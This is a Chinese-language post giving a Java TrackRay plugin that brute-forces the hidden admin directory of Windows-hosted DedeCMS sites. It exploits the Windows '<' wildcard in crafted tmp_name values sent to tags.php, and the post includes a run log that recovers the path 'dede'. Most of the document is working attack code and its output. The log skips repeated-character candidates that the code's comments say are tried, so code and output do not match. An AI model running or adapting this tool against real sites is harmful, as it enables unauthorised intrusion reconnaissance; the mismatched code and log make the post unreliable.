TrackRay插件
该插件依赖 Windows 文件系统在解析路径时把 `<` 当作通配符（NT 的 DOS_STAR 语义）的特性：只有当目标站点下存在以所猜前缀开头的目录时，形如 `./前缀<</images/adminico.gif` 的 tmp_name 才能被服务端成功打开，所以只对部署在 Windows 上的 DedeCMS 有效；Linux 下 `<` 只是普通字符，探测永远失败。判定依据是响应状态码为 200 且正文中不含 "Upload filetype not allow"，因此对非 DedeCMS 站点、改过提示语的版本或被 WAF 拦截的目标会产生误报——使用前应先用一个不可能存在的目录名发一次对照请求，确认它确实被拒绝。
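@Rule(param = {"target"} , websocket = true )
@Plugin(title = "dedecms windows下后台暴力猜解" , author = "blue")
public class DedeFindManage extends WebSocketPlugin {

    /**
     * Candidate alphabet for directory-name characters. Windows path lookup is
     * case-insensitive, so lowercase alone covers uppercase names. Note that '-'
     * is NOT in the set: a directory containing it cannot be fully recovered.
     */
    private final String characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#";

    /** Target base URL, set by {@link #check(Map)} and completed with "/tags.php" in {@link #start()}. */
    private String url;

    /** Longest prefix length tried in phase 1. (39^7 probes is not reachable in practice; in the recorded run the hit came at length 2.) */
    private static final int MAX_PREFIX_LEN = 7;

    /** Maximum number of characters appended in phase 2 (upper bound on the directory name length). */
    private static final int MAX_DIR_LEN = 30;

    /**
     * tmp_name template. The doubled '<' is interpreted by Windows as a wildcard
     * during path resolution, which is why this plugin only works against a
     * Windows host; on Linux '<' is a literal character and every probe fails.
     */
    private static final String PAYLOAD = "./%s<</images/adminico.gif";

    /** Substring DedeCMS emits when the probed tmp_name could not be opened as an image. */
    private static final String REJECT_MARKER = "Upload filetype not allow";

    /** Request parameter that carries the probe path. */
    private static final String TMP_NAME_KEY = "_FILES[mochazz][tmp_name]";

    /**
     * Validates the plugin parameters.
     *
     * @param param parameter map supplied by the framework; must contain a non-blank "target"
     * @return true when "target" is present and non-blank; false (never an NPE) otherwise
     */
    @Override
    public boolean check(Map param) {
        if (param == null) {
            return false;
        }
        Object target = param.get("target");
        if (target == null || StringUtils.isBlank(target.toString())) {
            return false;
        }
        url = target.toString().trim();
        return true;
    }

    /**
     * Runs the two-phase guess: (1) find the shortest prefix for which the
     * wildcard probe succeeds, (2) extend it one character at a time until no
     * character extends it any further.
     *
     * @return the recovered directory name, or "" when the oracle is unusable or no prefix was found
     */
    @Override
    @SuppressWarnings("unchecked")
    public Object start() {
        // Strip trailing slashes so a target like "http://host/site/" does not yield "site//tags.php".
        url = url.replaceAll("/+$", "") + "/tags.php";

        // Raw Map kept on purpose: setParamMap's declared element types are not visible in this file.
        Map params = new HashMap<String, String>();
        params.put(TMP_NAME_KEY, "");
        params.put("_FILES[mochazz][name]", "0");
        params.put("_FILES[mochazz][size]", "0");
        params.put("_FILES[mochazz][type]", "image/gif");

        crawlerPage.getRequest().setUrl(url);
        crawlerPage.getRequest().setHttpMethod(HttpMethod.POST);
        crawlerPage.getRequest().setParamMap(params);
        Fetcher fetcher = new Fetcher();

        // Negative control: a name that cannot exist must be rejected. If it is not,
        // the oracle is unusable (not DedeCMS, not Windows, rejection text changed,
        // WAF/error page with status 200) and every candidate would look like a hit.
        String control = "ctl" + Long.toHexString(System.nanoTime());
        if (isHit(fetcher, params, control)) {
            send("[-]control probe was not rejected; oracle unusable (not DedeCMS, not Windows, or message changed)");
            return "";
        }

        String prefix = findPrefix(fetcher, params);
        if (StringUtils.isBlank(prefix)) {
            send("[-]no matching prefix found");
            return "";
        }
        send("prefix:" + prefix);

        prefix = extend(fetcher, params, prefix);
        send("[+]后台地址为:" + prefix);
        return prefix;
    }

    /**
     * Phase 1: returns the shortest string s (length 1..MAX_PREFIX_LEN, alphabet
     * order) for which the probe "./s<<" is accepted, or "" if none is.
     * Candidates are generated lazily with an odometer over the alphabet instead
     * of being materialised in a list (39^5 strings already exhausts memory), and
     * repeated characters are included — a permutation-style generator would never
     * try names such as "aa...".
     */
    private String findPrefix(Fetcher fetcher, Map params) {
        char[] chars = characters.toCharArray();
        for (int len = 1; len <= MAX_PREFIX_LEN; len++) {
            int[] idx = new int[len];
            char[] buf = new char[len];
            while (true) {
                for (int k = 0; k < len; k++) {
                    buf[k] = chars[idx[k]];
                }
                String candidate = new String(buf);
                send("testing:" + candidate);
                if (isHit(fetcher, params, candidate)) {
                    return candidate;
                }
                // Advance the odometer; the rightmost position is the least significant.
                int pos = len - 1;
                while (pos >= 0 && ++idx[pos] == chars.length) {
                    idx[pos] = 0;
                    pos--;
                }
                if (pos < 0) {
                    break; // all 39^len candidates of this length exhausted
                }
            }
        }
        return "";
    }

    /**
     * Phase 2: greedily appends one alphabet character at a time while the probe
     * still succeeds. Stops after a full pass finds no extension (name complete,
     * or it continues with a character outside the alphabet) or after MAX_DIR_LEN
     * rounds. Unlike a "stop on last alphabet character" flag, a hit on '#' does
     * not terminate the search early.
     */
    private String extend(Fetcher fetcher, Map params, String prefix) {
        String found = prefix;
        for (int round = 0; round < MAX_DIR_LEN; round++) {
            boolean grew = false;
            for (char c : characters.toCharArray()) {
                if (isHit(fetcher, params, found + c)) {
                    found += c;
                    send("[+]" + found);
                    grew = true;
                    break;
                }
            }
            if (!grew) {
                break;
            }
        }
        return found;
    }

    /**
     * Sends one probe with tmp_name = PAYLOAD(candidate) and reports whether the
     * server accepted it: status 200 and a body that does not contain
     * REJECT_MARKER. A missing body (transport failure) is a miss, never a hit.
     */
    @SuppressWarnings("unchecked")
    private boolean isHit(Fetcher fetcher, Map params, String candidate) {
        params.put(TMP_NAME_KEY, String.format(PAYLOAD, candidate));
        fetcher.run(crawlerPage);
        String body = crawlerPage.getResponse().getStatus().getContentString();
        int code = crawlerPage.getResponse().getStatus().getStatusCode();
        return body != null && code == 200 && !body.contains(REJECT_MARKER);
    }

    /**
     * Appends to {@code list} every string of length {@code len} built from the
     * characters of {@code str} without repeating a character (a permutation,
     * not a product). Kept for API compatibility; {@link #start()} no longer
     * uses it because it omits repeated characters and materialises every
     * candidate in memory.
     *
     * @param list   output collector
     * @param str    alphabet to draw from
     * @param result current partial string (pass "" initially)
     * @param len    target length
     */
    public void permutation1(ArrayList<String> list, String str, String result, int len){
        if(result.length()==len){ // one complete string of the requested length
            list.add(result);
        }
        else{
            for(int i=0;i<str.length();i++){
                if(result.indexOf(str.charAt(i))<0){ // skip characters already used in result
                    permutation1(list, str, result+str.charAt(i), len);
                }
            }
        }
    }

    /** Local smoke entry: only sets the parameter map; the framework drives check()/start(). */
    public static void main(String[] args) {
        DedeFindManage dede = new DedeFindManage();
        dede.setParam(new HashMap<String,Object>(){{
            put("target","http://localhost/dede/");
        }});
    }
}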
运行结果
testing:a
testing:b
testing:c
testing:d
testing:e
testing:f
testing:g
testing:h
testing:i
testing:j
testing:k
testing:l
testing:m
testing:n
testing:o
testing:p
testing:q
testing:r
testing:s
testing:t
testing:u
testing:v
testing:w
testing:x
testing:y
testing:z
testing:0
testing:1
testing:2
testing:3
testing:4
testing:5
testing:6
testing:7
testing:8
testing:9
testing:_
testing:!
testing:#
testing:ab
testing:ac
testing:ad
testing:ae
testing:af
testing:ag
testing:ah
testing:ai
testing:aj
testing:ak
testing:al
testing:am
testing:an
testing:ao
testing:ap
testing:aq
testing:ar
testing:as
testing:at
testing:au
testing:av
testing:aw
testing:ax
testing:ay
testing:az
testing:a0
testing:a1
testing:a2
testing:a3
testing:a4
testing:a5
testing:a6
testing:a7
testing:a8
testing:a9
testing:a_
testing:a!
testing:a#
testing:ba
testing:bc
testing:bd
testing:be
testing:bf
testing:bg
testing:bh
testing:bi
testing:bj
testing:bk
testing:bl
testing:bm
testing:bn
testing:bo
testing:bp
testing:bq
testing:br
testing:bs
testing:bt
testing:bu
testing:bv
testing:bw
testing:bx
testing:by
testing:bz
testing:b0
testing:b1
testing:b2
testing:b3
testing:b4
testing:b5
testing:b6
testing:b7
testing:b8
testing:b9
testing:b_
testing:b!
testing:b#
testing:ca
testing:cb
testing:cd
testing:ce
testing:cf
testing:cg
testing:ch
testing:ci
testing:cj
testing:ck
testing:cl
testing:cm
testing:cn
testing:co
testing:cp
testing:cq
testing:cr
testing:cs
testing:ct
testing:cu
testing:cv
testing:cw
testing:cx
testing:cy
testing:cz
testing:c0
testing:c1
testing:c2
testing:c3
testing:c4
testing:c5
testing:c6
testing:c7
testing:c8
testing:c9
testing:c_
testing:c!
testing:c#
testing:da
testing:db
testing:dc
testing:de
prefix:de
[+]ded
[+]dede
[+]后台地址为:dede
参考
https://xz.aliyun.com/t/2064
https://www.cnblogs.com/zhaijiahui/p/8484667.html